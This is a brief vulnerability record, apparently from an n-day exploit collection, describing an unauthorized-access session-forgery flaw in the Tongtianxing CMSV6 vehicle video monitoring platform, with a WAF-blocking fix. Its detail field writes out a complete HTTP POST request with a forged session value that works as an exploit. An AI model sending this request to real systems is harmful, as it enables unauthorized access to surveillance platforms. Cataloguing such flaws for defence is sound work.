vendor = "通天星"
name = "通天星CMSV6车载视频监控平台SESSION伪造漏洞"
type = "未授权访问"
version = "未知"
path = "/808gps/LocationManagement/UserSessionAction_saveUserSession.action"
detail = "POST /808gps/LocationManagement/UserSessionAction_saveUserSession.action HTTP/1.1 Host: User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:103.0)Gecko/20100101Firefox/103.0 Content-Type: application/x-www-form-urlencoded userSession=42AA7A2BE767123A42E1530ACC920781&amp;amp;id=4"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
